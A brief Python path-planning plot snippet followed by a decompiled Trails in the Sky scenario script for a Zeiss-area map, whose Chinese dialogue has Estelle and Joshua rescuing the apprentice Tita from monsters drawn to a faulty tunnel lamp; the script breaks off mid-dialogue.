plotter3 = Plotter()
plotter3.add_robot(source, dist)
plotter3.add_obstacles(workspace_obstacles)
plotter3.add_robot(dest, dist)
plotter3.add_visibility_graph(lines)
plotter3.add_shorterst_path(list(shortest_path))
plotter3.show_graph()
|
from ED6ScenarioHelper import *
def main():
# 蔡斯
CreateScenaFile(
FileName = 'R3401 ._SN',
MapName = 'Zeiss',
Location = 'R3401.x',
MapIndex = 1,
MapDefaultBGM = "ed60030",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'魔兽', # 9
'魔兽', # 10
'魔兽', # 11
'魔兽', # 12
'艾尔·雷登关所方向', # 13
'蔡斯方向', # 14
' ', # 15
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 45,
Unknown_32 = 0,
Unknown_34 = 360,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 0,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT09/CH10750 ._CH', # 00
'ED6_DT07/CH00160 ._CH', # 01
'ED6_DT07/CH00162 ._CH', # 02
'ED6_DT07/CH00100 ._CH', # 03
'ED6_DT07/CH00101 ._CH', # 04
'ED6_DT07/CH00110 ._CH', # 05
'ED6_DT07/CH00111 ._CH', # 06
'ED6_DT07/CH00102 ._CH', # 07
'ED6_DT07/CH00161 ._CH', # 08
'ED6_DT09/CH10130 ._CH', # 09
'ED6_DT09/CH10131 ._CH', # 0A
'ED6_DT09/CH10750 ._CH', # 0B
'ED6_DT09/CH10751 ._CH', # 0C
'ED6_DT09/CH10760 ._CH', # 0D
'ED6_DT09/CH10761 ._CH', # 0E
'ED6_DT09/CH10770 ._CH', # 0F
'ED6_DT09/CH10771 ._CH', # 10
)
AddCharChipPat(
'ED6_DT09/CH10750P._CP', # 00
'ED6_DT07/CH00160P._CP', # 01
'ED6_DT07/CH00162P._CP', # 02
'ED6_DT07/CH00100P._CP', # 03
'ED6_DT07/CH00101P._CP', # 04
'ED6_DT07/CH00110P._CP', # 05
'ED6_DT07/CH00111P._CP', # 06
'ED6_DT07/CH00102P._CP', # 07
'ED6_DT07/CH00161P._CP', # 08
'ED6_DT09/CH10130P._CP', # 09
'ED6_DT09/CH10131P._CP', # 0A
'ED6_DT09/CH10750P._CP', # 0B
'ED6_DT09/CH10751P._CP', # 0C
'ED6_DT09/CH10760P._CP', # 0D
'ED6_DT09/CH10761P._CP', # 0E
'ED6_DT09/CH10770P._CP', # 0F
'ED6_DT09/CH10771P._CP', # 10
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 169300,
Z = 0,
Y = -27030,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 330710,
Z = 0,
Y = -37560,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 180,
Unknown2 = 0,
Unknown3 = 1,
ChipIndex = 0x0,
NpcIndex = 0x181,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclMonster(
X = 257600,
Z = 70,
Y = -24310,
Unknown_0C = 180,
Unknown_0E = 15,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x1D3,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = 286240,
Z = 20,
Y = -35830,
Unknown_0C = 180,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0x1D1,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclEvent(
X = 222300,
Y = -1000,
Z = -28000,
Range = 217700,
Unknown_10 = 0x7D0,
Unknown_14 = 0xFFFF6CBC,
Unknown_18 = 0x0,
Unknown_1C = 4,
)
DeclActor(
TriggerX = 199000,
TriggerZ = 500,
TriggerY = -22200,
TriggerRange = 800,
ActorX = 199000,
ActorZ = 1500,
ActorY = -22200,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 3,
Unknown_22 = 0,
)
DeclActor(
TriggerX = 285640,
TriggerZ = 0,
TriggerY = -26290,
TriggerRange = 1000,
ActorX = 285640,
ActorZ = 1000,
ActorY = -26290,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 5,
Unknown_22 = 0,
)
ScpFunction(
"Function_0_2B2", # 00, 0
"Function_1_2B3", # 01, 1
"Function_2_324", # 02, 2
"Function_3_4AC", # 03, 3
"Function_4_637", # 04, 4
"Function_5_1E52", # 05, 5
)
def Function_0_2B2(): pass
label("Function_0_2B2")
Return()
# Function_0_2B2 end
def Function_1_2B3(): pass
label("Function_1_2B3")
OP_16(0x2, 0xFA0, 0x1F018, 0xFFFD9AB8, 0x30038)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 6)), scpexpr(EXPR_END)), "loc_2DA")
OP_71(0x0, 0x4)
OP_72(0x1, 0x4)
OP_64(0x0, 0x1)
label("loc_2DA")
LoadEffect(0x0, "map\\\\mp027_00.eff")
PlayEffect(0x0, 0x0, 0xFF, 285640, 1000, -26290, 0, 0, 0, 1300, 1300, 1300, 0xFF, 0, 0, 0, 0)
Return()
# Function_1_2B3 end
def Function_2_324(): pass
label("Function_2_324")
OP_51(0xFE, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
RunExpression(0x0, (scpexpr(EXPR_RAND), scpexpr(EXPR_PUSH_LONG, 0xE), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_354")
OP_99(0xFE, 0x0, 0x7, 0x672)
Jump("loc_496")
label("loc_354")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_36D")
OP_99(0xFE, 0x1, 0x7, 0x640)
Jump("loc_496")
label("loc_36D")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_386")
OP_99(0xFE, 0x2, 0x7, 0x60E)
Jump("loc_496")
label("loc_386")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_39F")
OP_99(0xFE, 0x3, 0x7, 0x5DC)
Jump("loc_496")
label("loc_39F")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x4), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3B8")
OP_99(0xFE, 0x4, 0x7, 0x5AA)
Jump("loc_496")
label("loc_3B8")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x5), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3D1")
OP_99(0xFE, 0x5, 0x7, 0x578)
Jump("loc_496")
label("loc_3D1")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3EA")
OP_99(0xFE, 0x6, 0x7, 0x546)
Jump("loc_496")
label("loc_3EA")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_403")
OP_99(0xFE, 0x0, 0x7, 0x677)
Jump("loc_496")
label("loc_403")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_41C")
OP_99(0xFE, 0x1, 0x7, 0x645)
Jump("loc_496")
label("loc_41C")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x9), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_435")
OP_99(0xFE, 0x2, 0x7, 0x613)
Jump("loc_496")
label("loc_435")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xA), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_44E")
OP_99(0xFE, 0x3, 0x7, 0x5E1)
Jump("loc_496")
label("loc_44E")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xB), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_467")
OP_99(0xFE, 0x4, 0x7, 0x5AF)
Jump("loc_496")
label("loc_467")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xC), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_480")
OP_99(0xFE, 0x5, 0x7, 0x57D)
Jump("loc_496")
label("loc_480")
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xD), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_496")
OP_99(0xFE, 0x6, 0x7, 0x54B)
label("loc_496")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_4AB")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("loc_496")
label("loc_4AB")
Return()
# Function_2_324 end
def Function_3_4AC(): pass
label("Function_3_4AC")
EventBegin(0x0)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5C9")
OP_A2(0x504)
Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_4FE")
ChrTalk(
0x101,
(
"#004F咦……\x01",
"这个照明灯,是不是有点怪呢?\x02",
)
)
CloseMessageWindow()
Jump("loc_534")
label("loc_4FE")
ChrTalk(
0x101,
(
"#004F咦……\x01",
"那个照明灯,是不是有点怪呢?\x02",
)
)
CloseMessageWindow()
label("loc_534")
ChrTalk(
0x102,
(
"#012F确实是。\x01",
"应该是有点故障了。\x02\x03",
"导力器的导力\x01",
"是可以自动积蓄的,\x01",
"所以,我想应该不用担心……\x02",
)
)
CloseMessageWindow()
Jump("loc_634")
label("loc_5C9")
Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_600")
ChrTalk(
0x101,
"#000F照明灯好像有点怪怪的。\x02",
)
CloseMessageWindow()
Jump("loc_634")
label("loc_600")
ChrTalk(
0x102,
(
"#015F照明灯有点闪烁。\x01",
"看来有点故障了。\x02",
)
)
CloseMessageWindow()
label("loc_634")
EventEnd(0x1)
Return()
# Function_3_4AC end
def Function_4_637(): pass
label("Function_4_637")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 5)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_1E51")
OP_71(0x0, 0x4)
OP_71(0x1, 0x4)
OP_A2(0x506)
EventBegin(0x0)
ClearChrFlags(0x8, 0x80)
ClearChrFlags(0x9, 0x80)
ClearChrFlags(0xA, 0x80)
ClearChrFlags(0xB, 0x80)
SetChrPos(0x8, 197700, 0, -23200, 45)
SetChrPos(0x9, 199000, 0, -24200, 0)
SetChrPos(0xA, 200900, 0, -24200, 315)
SetChrPos(0xB, 200600, 0, -23100, 315)
SetChrFlags(0x8, 0x40)
SetChrFlags(0x9, 0x40)
SetChrFlags(0xA, 0x40)
SetChrFlags(0xB, 0x40)
NpcTalk(
0x8,
"女孩子的声音",
"啊——!\x02",
)
CloseMessageWindow()
OP_20(0x5DC)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
Fade(1000)
OP_6C(45000, 0)
OP_6D(200700, 2000, -24400, 0)
OP_31(0x6, 0x0, 0x12)
OP_B5(0x6, 0x0)
OP_B5(0x6, 0x1)
OP_B5(0x6, 0x5)
OP_B5(0x6, 0x4)
OP_41(0x6, 0xB5)
OP_41(0x6, 0xF4)
OP_41(0x6, 0x112)
OP_41(0x6, 0x2C9, 0x0)
OP_41(0x6, 0x271, 0x1)
OP_41(0x6, 0x262, 0x5)
OP_41(0x6, 0x26B, 0x4)
OP_35(0x6, 0xD2)
OP_36(0x6, 0x104)
AddParty(0x6, 0xFF)
SetChrPos(0x107, 204300, 0, -26400, 270)
OP_0D()
OP_21()
OP_1D(0x56)
SetChrFlags(0x101, 0x1000)
SetChrFlags(0x102, 0x1000)
Sleep(500)
OP_62(0x107, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
NpcTalk(
0x107,
"小女孩",
(
"#065F#2P已、已经聚集了\x01",
"这么多只魔兽啊~……\x02\x03",
"这样下去会坏掉的……\x02\x03",
"既、既然这样的话……\x02",
)
)
CloseMessageWindow()
def lambda_81F():
OP_6B(2600, 2500)
ExitThread()
QueueWorkItem(0x107, 1, lambda_81F)
Sleep(1000)
OP_22(0xD8, 0x0, 0x64)
SetChrChipByIndex(0x107, 2)
OP_51(0x107, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(1000)
Sleep(500)
TurnDirection(0x107, 0xA, 0)
NpcTalk(
0x107,
"小女孩",
"#062F#2P方向OK,仰角20度……\x02",
)
CloseMessageWindow()
Sleep(400)
NpcTalk(
0x107,
"小女孩",
(
"#062F导力填充率30%……\x02\x03",
"#068F……发射!!\x02",
)
)
CloseMessageWindow()
LoadEffect(0x2, "map\\\\mp019_00.eff")
def lambda_901():
OP_94(0x1, 0xFE, 0xB4, 0x1F4, 0x1388, 0x0)
ExitThread()
QueueWorkItem(0x107, 1, lambda_901)
SetChrChipByIndex(0x107, 2)
SetChrPos(0xE, 196500, 1500, -22500, 0)
OP_22(0x1FA, 0x0, 0x64)
PlayEffect(0x2, 0xFF, 0x107, 250, 1000, 250, 0, 0, 0, 1000, 1000, 1000, 0xE, 0, 0, 0, 0)
OP_99(0x107, 0x0, 0x3, 0x7D0)
OP_99(0x107, 0x3, 0x7, 0x7D0)
def lambda_979():
OP_94(0x1, 0xFE, 0x78, 0x384, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_979)
def lambda_98F():
OP_94(0x1, 0xFE, 0xB4, 0x3E8, 0x1388, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_98F)
def lambda_9A5():
OP_94(0x1, 0xFE, 0xE6, 0x2BC, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_9A5)
def lambda_9BB():
OP_94(0x1, 0xFE, 0x5A, 0x1F4, 0xFA0, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_9BB)
Sleep(1000)
WaitChrThread(0x8, 0x1)
def lambda_9DB():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0x8, 1, lambda_9DB)
WaitChrThread(0x9, 0x1)
def lambda_9EE():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0x9, 1, lambda_9EE)
WaitChrThread(0xA, 0x1)
def lambda_A01():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0xA, 1, lambda_A01)
WaitChrThread(0xB, 0x1)
def lambda_A14():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0xB, 1, lambda_A14)
OP_8C(0x107, 270, 0)
Sleep(400)
NpcTalk(
0x107,
"小女孩",
(
"#062F#2P再、再靠近的话,\x01",
"这次真的会打中你们哦!\x02\x03",
"真、真的哦,我是认真的!\x02",
)
)
CloseMessageWindow()
OP_62(0xA, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(300)
OP_62(0x9, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(100)
OP_62(0xB, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(100)
OP_62(0x8, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(200)
Sleep(1000)
def lambda_AE6():
OP_6D(201700, 2000, -25100, 2500)
ExitThread()
QueueWorkItem(0x101, 1, lambda_AE6)
SetChrFlags(0x8, 0x20)
SetChrFlags(0x9, 0x20)
SetChrFlags(0xA, 0x20)
SetChrFlags(0xB, 0x20)
def lambda_B12():
OP_94(0x0, 0xFE, 0x0, 0x12C, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_B12)
OP_63(0xA)
Sleep(300)
def lambda_B30():
OP_94(0x0, 0xFE, 0x0, 0x258, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_B30)
OP_63(0xB)
def lambda_B49():
OP_94(0x0, 0xFE, 0x0, 0x3E8, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_B49)
OP_63(0x9)
Sleep(600)
def lambda_B67():
OP_94(0x0, 0xFE, 0x0, 0x320, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_B67)
OP_63(0x8)
SetChrChipByIndex(0x107, 1)
OP_62(0x107, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1)
OP_22(0x31, 0x0, 0x64)
Sleep(1700)
NpcTalk(
0x107,
"小女孩",
(
"#065F#2P啊……\x01",
"起、起到反效果了……\x02",
)
)
CloseMessageWindow()
SetChrPos(0x101, 210200, 0, -30000, 0)
SetChrPos(0x102, 209330, 0, -30000, 0)
SetChrFlags(0x102, 0x4)
def lambda_C0F():
OP_94(0x0, 0xFE, 0x0, 0x3E8, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_C0F)
Sleep(150)
def lambda_C2A():
OP_94(0x0, 0xFE, 0x0, 0x3E8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_C2A)
def lambda_C40():
OP_94(0x0, 0xFE, 0x0, 0x1F4, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_C40)
Sleep(300)
def lambda_C5B():
OP_94(0x0, 0xFE, 0x0, 0x258, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_C5B)
Sleep(400)
NpcTalk(
0x107,
"小女孩",
"#069F#2P呀……!\x02",
)
OP_9E(0x107, 0x14, 0x0, 0x190, 0xFA0)
CloseMessageWindow()
def lambda_CA6():
OP_94(0x0, 0xA, 0x0, 0x7D0, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_CA6)
SetChrFlags(0x101, 0x1000)
SetChrFlags(0x102, 0x1000)
SetChrChipByIndex(0x101, 4)
SetChrChipByIndex(0x102, 6)
def lambda_CD0():
OP_6B(3160, 1500)
ExitThread()
QueueWorkItem(0x101, 0, lambda_CD0)
def lambda_CE0():
OP_6D(203200, 0, -24900, 1500)
ExitThread()
QueueWorkItem(0x101, 2, lambda_CE0)
def lambda_CF8():
OP_6C(78000, 1200)
ExitThread()
QueueWorkItem(0x102, 2, lambda_CF8)
ChrTalk(
0x101,
"#10A#1P喔喔喔喔喔!\x05\x02",
)
OP_8E(0x101, 0x326F4, 0x0, 0xFFFF9886, 0x2710, 0x0)
def lambda_D32():
OP_8E(0xFE, 0x317B8, 0x0, 0xFFFF952A, 0x2328, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_D32)
def lambda_D4D():
OP_8C(0xFE, 135, 400)
ExitThread()
QueueWorkItem(0x107, 2, lambda_D4D)
SetChrFlags(0x107, 0x1000)
SetChrChipByIndex(0x107, 8)
def lambda_D65():
OP_8F(0xFE, 0x3214A, 0x0, 0xFFFF9566, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x107, 1, lambda_D65)
OP_51(0x101, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
SetChrChipByIndex(0x101, 7)
def lambda_D90():
OP_99(0xFE, 0x0, 0xC, 0x9C4)
ExitThread()
QueueWorkItem(0x101, 3, lambda_D90)
OP_22(0xA4, 0x0, 0x64)
OP_22(0x1F4, 0x0, 0x64)
OP_96(0x101, 0x31830, 0x0, 0xFFFF9C00, 0x5DC, 0x1770)
OP_7C(0x0, 0x64, 0xBB8, 0x64)
PlayEffect(0x8, 0xFF, 0xFF, 202800, 0, -25600, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
def lambda_E07():
OP_94(0x1, 0xA, 0xB4, 0x7D0, 0x3A98, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_E07)
OP_96(0x101, 0x31A92, 0x0, 0xFFFF9A52, 0x1F4, 0x1388)
def lambda_E34():
OP_94(0x1, 0xFE, 0xB4, 0x384, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_E34)
def lambda_E4A():
OP_94(0x1, 0xFE, 0xB4, 0x3E8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_E4A)
def lambda_E60():
OP_94(0x1, 0xFE, 0xB4, 0x1F4, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_E60)
WaitChrThread(0x102, 0x1)
SetChrChipByIndex(0x102, 5)
ClearChrFlags(0x102, 0x4)
Sleep(1000)
NpcTalk(
0x107,
"小女孩",
"#065F咦……\x02",
)
CloseMessageWindow()
SetChrChipByIndex(0x107, 1)
ClearChrFlags(0x107, 0x1000)
TurnDirection(0x107, 0x101, 400)
NpcTalk(
0x107,
"小女孩",
"#560F啊,刚才的……!\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#006F待会再慢慢聊吧!\x01",
"你先退到我们后面去!\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#012F总之\x01",
"先把这些家伙赶走吧!\x02",
)
)
CloseMessageWindow()
Battle(0x3A7, 0x0, 0x0, 0x0, 0xFF)
Switch(
(scpexpr(EXPR_PUSH_VALUE_INDEX, 0x3), scpexpr(EXPR_END)),
(1, "loc_F49"),
(SWITCH_DEFAULT, "loc_F4C"),
)
label("loc_F49")
OP_B4(0x0)
Return()
label("loc_F4C")
EventBegin(0x0)
OP_4F(0x23, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
SetChrFlags(0x8, 0x80)
SetChrFlags(0x9, 0x80)
SetChrFlags(0xA, 0x80)
SetChrFlags(0xB, 0x80)
SetChrPos(0x101, 202800, 0, -25600, 315)
SetChrPos(0x102, 202500, 0, -27300, 315)
SetChrPos(0x107, 204200, 0, -26900, 315)
OP_6D(203400, 0, -26050, 0)
SetChrChipByIndex(0x107, 65535)
OP_71(0x0, 0x4)
OP_71(0x1, 0x4)
FadeToBright(1000, 0)
OP_0D()
NpcTalk(
0x107,
"小女孩",
(
"#065F真、真是吓死人了~……\x02\x03",
"#067F那个那个……\x01",
"真是非常感谢呢。\x02\x03",
"救了我一命呢。\x02",
)
)
CloseMessageWindow()
OP_44(0x102, 0xFF)
OP_44(0x101, 0xFF)
def lambda_1040():
OP_6B(2790, 2000)
ExitThread()
QueueWorkItem(0x101, 0, lambda_1040)
SetChrChipByIndex(0x102, 65535)
TurnDirection(0x102, 0x107, 400)
SetChrChipByIndex(0x101, 65535)
TurnDirection(0x101, 0x107, 400)
WaitChrThread(0x101, 0x0)
ChrTalk(
0x101,
(
"#001F啊哈哈。\x01",
"你没事就好了。\x02\x03",
"#006F不过……\x01",
"以后可要吸取教训哦。\x02\x03",
"一个人和魔兽战斗\x01",
"这种危险的事可不能做哦。\x02",
)
)
CloseMessageWindow()
NpcTalk(
0x107,
"小女孩",
(
"#065F啊,但是但是……\x02\x03",
"如果放着不管的话,\x01",
"隧道的照明灯会坏掉呢……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#505F这么说来……\x02\x03",
"为什么魔兽会聚集在\x01",
"熄灭了的照明灯周围呢?\x02",
)
)
CloseMessageWindow()
Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x6, 0x1, 0x8)"), scpexpr(EXPR_END)), "loc_12D6")
ChrTalk(
0x102,
(
"#010F以前在更换路灯的时候\x01",
"不是也发生过同样的事吗?\x02\x03",
"因为导力器里的七耀石\x01",
"是魔兽喜欢的东西。\x02\x03",
"因此路灯里\x01",
"都带有驱赶魔兽的机能……\x02\x03",
"如果这种机能坏了的话,\x01",
"自然就会容易吸引魔兽过来。\x02",
)
)
CloseMessageWindow()
Jump("loc_1392")
label("loc_12D6")
ChrTalk(
0x102,
(
"#010F因为导力器里的七耀石\x01",
"是魔兽喜欢的东西。\x02\x03",
"因此路灯里\x01",
"都带有驱赶魔兽的机能……\x02\x03",
"如果这种机能坏了的话,\x01",
"自然就会容易吸引魔兽过来。\x02",
)
)
CloseMessageWindow()
label("loc_1392")
ChrTalk(
0x101,
(
"#501F啊,原来是这样啊。\x02\x03",
"#007F不过就算这样,\x01",
"也不能这么胡来啊。\x02\x03",
"万一受伤的话可就不好了。\x02",
)
)
CloseMessageWindow()
NpcTalk(
0x107,
"小女孩",
(
"#063F啊……\x01",
"对、对不起……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#019F好了好了,到此为止吧。\x02\x03",
"更何况,『不能胡来』从你嘴里说出来,\x01",
"可是完全没有说服力啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#509F讨厌,少泼冷水啦。\x02\x03",
"#006F算了……\x01",
"我叫艾丝蒂尔。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F我是约修亚。\x02\x03",
"我们俩都是\x01",
"游击士协会的见习游击士。\x02",
)
)
CloseMessageWindow()
NpcTalk(
0x107,
"小女孩",
(
"#061F哇~~\x01",
"难怪那么厉害呢……\x02\x03",
"#060F我叫提妲。\x02\x03",
"现在正在\x01",
"蔡斯的中央工房实习。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#501F嘿嘿~\x01",
"所以才会打扮成这样吧。\x02\x03",
"那么,提妲。\x02\x03",
"你要回蔡斯的话,\x01",
"就和我们一起走吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是啊。\x01",
"如果再遇到魔兽就糟糕了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#061F真、真的吗?\x01",
"真是非常感谢呢。\x02\x03",
"#560F啊,不过请稍等一下。\x01",
" \x02\x03",
"我得先修理好那个照明灯。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#004F啊,那也是。\x01",
"这样放着不管的确非常危险。\x02\x03",
"不过……\x01",
"你是怎么知道这里的照明灯坏了呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#060F啊,我在调查电脑的\x01",
"数据库的时候偶然发现的。\x02\x03",
"好像当初安装时候用的是次品,\x01",
"而且设置元件也不齐全。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F原来如此,\x01",
"那你还是快看看吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
